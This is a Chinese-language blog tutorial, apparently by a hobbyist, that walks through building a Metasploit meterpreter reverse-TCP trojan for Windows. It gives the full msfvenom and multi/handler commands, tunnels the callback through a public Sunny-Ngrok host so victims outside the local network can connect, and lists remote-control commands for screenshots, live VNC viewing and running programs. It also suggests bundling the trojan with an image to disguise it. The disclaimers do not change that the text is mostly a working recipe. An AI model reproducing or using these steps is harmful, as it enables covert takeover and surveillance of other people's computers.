一个简单的msf远程渗透实验

原文链接

网络攻防如同打仗 知己知彼百战不殆

要想学会防守必先知道敌人如何进攻

此教程的远端测试全是我的好友帮助测试

并非实际攻击！！！

写一篇远程的渗透教程给大家
当然不是为了教大家去黑别人电脑
而是让大家明白原理，懂得如何防范，再三强调！！！

使用此教程用在不正当地方造成的后果与本人无关！！！

接下来开始本次教程
先给大家展示一下效果吧！基于此程序可以监视对方电脑，实时屏幕抓取，甚至实时屏幕监测，还有创建账户，操控电脑等强悍功能。
（功能很多这里就不过赘述了）

所以一般别人给你发的陌生程序千万不要去点！！！！！！！
手机和电脑一个道理，今天就拿电脑端给大家进行讲解，教程中如果出现错误，或者口误的地方，希望大家可以帮我指明，我会积极改正，谢谢大家！！！

不废话了，开始
这个就是通过screenshot命令进行远端屏幕截取的（当时是我的一个朋友帮我进行的远端测试，这是当时他的实时屏幕）

当然还有很多更强悍的命令，在后面再为大家一一介绍。

**首先介绍需要的的工具！！！

（这里就默认大家都有Linux了）

1.MSF本篇文章的重点工具
.

2.Sunny-Ngrok

（内网穿透工具，因为做好的程序需要对方进行回连，而对方又处在外网，所以想要访问你的主机，必须通过内网穿透才可以连接到你的主机，被你监测和控制）

3.win7虚拟机

（这里用作测试用，你可以在自己的物理机里面测试）

一：内网穿透的注册和隧道的使用

第一步打开Sunny官网，超级链接已部署，直接点就可以。然后果断点击注册。

因为我已经注册过了这里就不给大家演示了，不会注册就直接放弃吧，百度估计也救不了你了。

接下来直接点击隧道管理，然后点击开通隧道，作为白嫖党，当然不会让你们花钱的，直接拖到最下面

发现有个0元的，我的天这年头还有免费的，立即购买直接点下去，然后点击确认。

协议我们选择tcp，隧道名字自己随便取一个，远程端口在10000-11000之间选择，如果被用了的话，旁边有个查看可用端口，点击一下然后随便选取一个就可以。

接下来还有一个 本地端口，这里就是你虚拟机的端口，我这里是kali ，所以我看一下我kali的本地ip地址，在kali终端中输入 ifconfig 然后看一下你的ip地址如下图。

然后端口的话，我这里选择的是22端口，所以我填完后信息如下。大家模仿即可。因为我注册过一次，所以这些信息是我的端口的信息，就不再注册了。

接下来我们为kali下载Sunny的启动端，点击即可。自己下载所对应的版本，因为我的是64位的Linux，所以我之间下载64位的。

wget http://hls.ctopus.com/sunny/linux_amd64.zip?v=2

   
   

   
   
1

64位的Linux直接在终端输入以上代码即可下载。下载完后的压缩包在你的主目录中，点开即可看见。

下载下的文件名字可能会不一样你们自己找一找，然后对文件进行解压缩，将文件就解压缩进主目录即可。

右键文件夹，提取到此次即可，然后会多出来一个跟压缩包名字一样的文件夹，然后点开进去将里面的Sunny文件移到最外层的目录。

然后返回你刚刚注册的那个网站，登录上去，然后找见隧道管理，点击然后找见你的id,还有端口，将它们记下来。我这里的端口就是后面的10030.

然后在一个新的终端中，输入以下命令。

./sunny clientid bbbbdwadawd（这个是你刚刚通道的id）

   
   

   
   
1

出现这个界面证明你的内网穿透服务正常启动了，到此内网渗透的大部分工作完成了，接下来我们制作远程木马。

二.利用MSF制作远程木马

这步相对教为简单，大家按命令输入即可。
新开一个终端窗口

msfvenom -a x64 --platform Windows -p windows/x64/meterpreter/reverse_tcp  LHOST=free.idcfengye.com LPORT=10030 -f exe -o 木马名称.exe

   
   

   
   
1

这里的LHOST=后面的值不需要改，
LPORT=后面的值改为刚刚注册网页的隧道端口（就是第一个提示在10000-11000之间选择的那个端口）
木马名称自己写一个就好。

出现如下提示证明你的木马生成成功了，就在你的主目录下面。

这个就是我生成的木马，到这里木马就制作完成了，然后接下将这个木马移到我们测试的主机中，我这里是用win7测试的，所以以win7为例。

三.利用MSF和win7测码

至于如何将文件从Linux中移出来，且移到其它地方，这里就不再赘述了，本白这里用的是 Vm Tools ，当然方法有很多，个人认为这个比较无脑点，哈哈哈。

我把文件名字改成了成品，看的舒服点 ，哈哈哈。

然后切回到我们的linx界面
在终端中挨个输入如下命令

msfconsole

use exploit/multi/handler

set payload windows/x64/meterpreter/reverse_tcp

set lhost 192.168.187.131 //这个就是你刚刚网站的填写的IP

set lport 22 //这个就是刚刚IP后面跟着的端口

exploit

• 1
• 2
• 3
• 4
• 5
• 6
• 7
• 8
• 9
• 10
• 11

以上命令请一条一条运行 ！！！

运行完这些命令后你会出现如下界面

然后返回我们的win7，运行刚刚的木马程序。

出现这个界面证明对方上线了，此时你就可以进行操控了。

execute -f calc.exe

 
 

 
 
1

打开对方电脑的计算器。

这边提示创建成功，打开我们的win7看一下。

果不其然，win7的计算器自己开启了，然而这条命令只是冰山一角，命令还有好多，这里就不给大家测了，给大家写几条常用的吧。

sysinfe   //  查看对面电脑配置

screenshot //屏幕截图 截取对方电脑的屏幕

run vnc //实时监控对面屏幕

execute -f calc.exe //开计算器

• 1
• 2
• 3
• 4
• 5
• 6
• 7
• 8

因为这只是教大家原理和简单的方法，好多命令这里就不给大家说了，大家可以自行百度什么的。这个木马因为有了内网穿透是可以进行远端执行的。

当然这个木马，检测是肯定过不了的，不要想着怎么去坑害别人，
一定要坚守正义！！！！
一定要坚守正义！！！！
一定要坚守正义！！！！

至于如何过检测软件，大家就自己去摸索吧，这里不教给大家了，如果是为了给朋友发去，然后装X的话，你可以和一个图片什么的捆绑起来，看起来 就 有内味了，这里简单捆绑了一下，给大家看下效果。

点击软件后会出现上面的图片，闪一下，当然这需要提前将照片打包成 .exe 的格式的文件。好了好了 就写这么多了。

~
~
一个对网安疯狂热爱的小白的学习经验

希望能够让想学习网安的人提起一些兴趣

如果文章中有错误，或者不妥的地方请直接在评论中指明，本白会积极修改，还有就是想找个大佬带带我 毕竟一个学还是毕竟难的
~
~

如果你学到了一些东西请帮忙点个赞
真的很重要
谢谢大家